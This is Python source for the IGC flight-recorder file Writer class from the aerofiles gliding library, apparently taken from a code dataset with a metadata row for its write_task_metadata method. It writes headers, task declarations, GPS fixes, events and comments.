'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_metadata | python | def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record) | Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L484-L550 | null | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
